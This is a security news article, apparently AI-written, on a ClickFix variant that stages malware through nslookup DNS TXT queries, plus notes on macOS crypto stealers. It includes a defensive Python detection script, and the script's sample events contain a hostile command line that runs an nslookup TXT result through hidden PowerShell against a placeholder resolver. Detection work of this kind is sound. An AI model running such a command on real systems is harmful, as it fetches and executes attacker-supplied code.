Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

ClickFix: The Evolving DNS-Based Social Engineering Attack



Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

Microsoft has disclosed a new version of the ClickFix social engineering tactic that uses DNS as a "lightweight staging or signaling channel" for custom payloads. ClickFix has become widespread over the past two years and has spawned several variants. In this variant the threat actor uses a DNS lookup to reach infrastructure under their control, adds a validation layer, and only then retrieves and executes a second-stage payload from an external server. This highlights the evolving threat landscape and the increasing sophistication of the social engineering tactics used by attackers.

  • The latest version of ClickFix uses DNS as a "lightweight staging or signaling channel" to reach infrastructure under control.
  • The attack chain leads to the download of a ZIP archive and the execution of a malicious Python script, which conducts reconnaissance and drops a VBScript for ModeloRAT.
  • According to Flare, macOS stealers target no fewer than 103 Chrome crypto extensions, and attackers obtain valid Apple developer signatures to get past Gatekeeper protections.
  • Macs are a priority target for cryptocurrency thieves because cryptocurrency users disproportionately use Macs and crypto transactions are irreversible.
  • Organizations with Mac users need detection capabilities for macOS-specific TTPs, including unsigned applications and unusual Terminal activity.


  • Microsoft has disclosed details of a new version of the ClickFix social engineering tactic that relies on the "nslookup" (name server lookup) command, launched from the Windows Run dialog, to perform a custom DNS lookup against attacker-controlled infrastructure. ClickFix has become widespread over the past two years and has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

    The latest version of ClickFix uses DNS as a "lightweight staging or signaling channel," enabling the threat actor to reach infrastructure under their control and to erect a new validation layer before the second-stage payload is executed. That second-stage payload then initiates an attack chain that leads to the download of a ZIP archive from an external server ("azwsappdev[.]com"), from which a malicious Python script is extracted and run to conduct reconnaissance and discovery and to drop a Visual Basic Script (VBScript) responsible for launching ModeloRAT, a Python-based remote access trojan previously distributed through CrashFix.
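
The chain above leaves a distinctive footprint in process-creation telemetry: nslookup invoked from the Run dialog (a child of explorer.exe), asking for TXT records (the only record type that carries free-form text, which is what makes DNS usable as a payload or signalling channel), naming its own resolver instead of the configured corporate DNS, and feeding the answer into a shell. The following hunting logic is an added example, not code from Microsoft, the article, or any vendor; it scores constructed Sysmon Event ID 1 style records for that combination of signals. The field names, regexes, threshold and sample events are assumptions for illustration.

```python
"""Hunting logic for the nslookup-based ClickFix variant (added example).

Scores constructed Sysmon Event ID 1 style process-creation records for the
combination of signals the DNS-staging variant produces. Field names,
thresholds and the sample events are assumptions for illustration.
"""
import re

# Windows command lines are case-insensitive, so every pattern uses re.I.
RE_NSLOOKUP = re.compile(r"\bnslookup(?:\.exe)?\b", re.I)
# TXT lookups return arbitrary text; ordinary name resolution never needs them.
RE_TXT_QUERY = re.compile(r"-(?:q|query|type|querytype)=txt\b", re.I)
# The lookup result being piped or looped into a shell or script host.
RE_CHAINING = re.compile(
    r"\|\s*|\bfor\s+/f\b|\biex\b|invoke-expression|\bpowershell(?:\.exe)?\b|\bcmd(?:\.exe)?\s+/c\b",
    re.I,
)
RUN_DIALOG_PARENT = "explorer.exe"          # Win+R launches children of explorer.exe
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def nslookup_positionals(cmdline):
    """Positional arguments of the first nslookup call: [name] or [name, server].

    A second positional is an explicit resolver, i.e. the command talks to a
    server the attacker chose rather than to the configured corporate DNS.
    """
    m = RE_NSLOOKUP.search(cmdline)
    if not m:
        return []
    rest = re.split(r"[|&)]", cmdline[m.end():])[0]   # stop at pipe, separator or closing paren
    return [t.strip("'\"") for t in rest.split() if not t.startswith("-")]


def score_event(ev):
    """Return (score, reasons) for one process-creation record."""
    cmd = ev.get("CommandLine", "")
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    reasons = []
    if image != "nslookup.exe" and not RE_NSLOOKUP.search(cmd):
        return 0, reasons
    reasons.append("nslookup invoked")
    if RE_TXT_QUERY.search(cmd):
        reasons.append("TXT record query (data channel, not name resolution)")
    pos = nslookup_positionals(cmd)
    if len(pos) >= 2:
        reasons.append(f"explicit resolver {pos[1]} instead of configured DNS")
    if parent == RUN_DIALOG_PARENT:
        reasons.append("parent explorer.exe (consistent with the Run dialog)")
    if image in SHELL_IMAGES or RE_CHAINING.search(cmd):
        reasons.append("result chained into a shell or script host")
    return len(reasons), reasons


def detect(events, threshold=3):
    """Events with at least `threshold` signals; nslookup alone is never enough."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"id": ev["id"], "user": ev.get("User"), "score": score, "reasons": reasons})
    return alerts


# Constructed sample records; hostnames and addresses are placeholders (.invalid / TEST-NET).
SAMPLE_EVENTS = [
    {"id": "mal-1", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c for /f \"delims=\" %i in ('nslookup -q=txt verify.example.invalid 203.0.113.53') "
                    "do powershell -nop -w hidden -c \"%i\""},
    {"id": "mal-2", "User": "CORP\\bob",
     "Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "nslookup -type=txt check.example.invalid ns.example.invalid"},
    {"id": "benign-1", "User": "CORP\\ops",
     "Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup www.example.invalid"},
    {"id": "benign-2", "User": "CORP\\ops",                      # mail admin checking DMARC
     "Image": r"C:\Windows\System32\nslookup.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "nslookup -type=txt _dmarc.example.invalid"},
    {"id": "benign-3", "User": "CORP\\carol",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -NoProfile"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["id"], a["user"], a["score"], "; ".join(a["reasons"]))
```

The threshold of three signals is deliberate: a single `nslookup -type=txt` from an administrator's shell scores two and stays quiet, while a TXT query against a self-chosen resolver launched from the Run dialog scores four even before any pipe into PowerShell appears. In a real deployment the same logic maps onto a hunting query over your EDR's process-creation table, and the explorer.exe parent check can be corroborated with the user's RunMRU history.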

    The use of ClickFix techniques against macOS underlines a broader trend: threat actors are increasingly seeking out machines running Apple's operating system in order to infect them with infostealers and other sophisticated tooling.

    According to recent analysis published by Flare, no fewer than 103 Chrome crypto extensions are targeted by macOS stealers, with attackers obtaining valid Apple developer signatures to bypass Gatekeeper protections. "Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse."

    The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.

    This latest development in the ClickFix attack chain highlights the evolving threat landscape and the increasing sophistication of the social engineering tactics used by attackers. It also underscores the importance of vigilance and proactive detection, particularly for organizations whose Mac users hold cryptocurrency, since macOS stealers prioritize exactly that data.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/ClickFix-The-Evolving-DNS-Based-Social-Engineering-Attack-ehn.shtml

  • https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

  • https://www.securityweek.com/microsoft-warns-of-clickfix-attack-abusing-dns-lookups/

  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

  • https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/

  • https://thehackernews.com/2025/06/new-filefix-method-emerges-as-threat.html

  • https://cybersecuritynews.com/jackfix-attack-leverages-windows-updates/

  • https://thehackernews.com/2025/11/jackfix-uses-fake-windows-update-pop.html

  • https://www.bleepingcomputer.com/news/security/consentfix-debrief-insights-from-the-new-oauth-phishing-attack/

  • https://pushsecurity.com/blog/consentfix

  • https://www.microsoft.com/en-us/security/blog/2026/02/05/clickfix-variant-crashfix-deploying-python-rat-trojan/

  • https://thehackernews.com/2026/01/crashfix-chrome-extension-delivers.html

  • https://censys.com/blog/errtraffic-inside-glitchfix-attack-panel

  • https://thehackernews.com/2026/01/clickfix-attacks-expand-using-fake.html

  • https://malware-guide.com/blog/remove-modelorat


  • Published: Wed Feb 18 14:06:54 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News . All rights reserved.
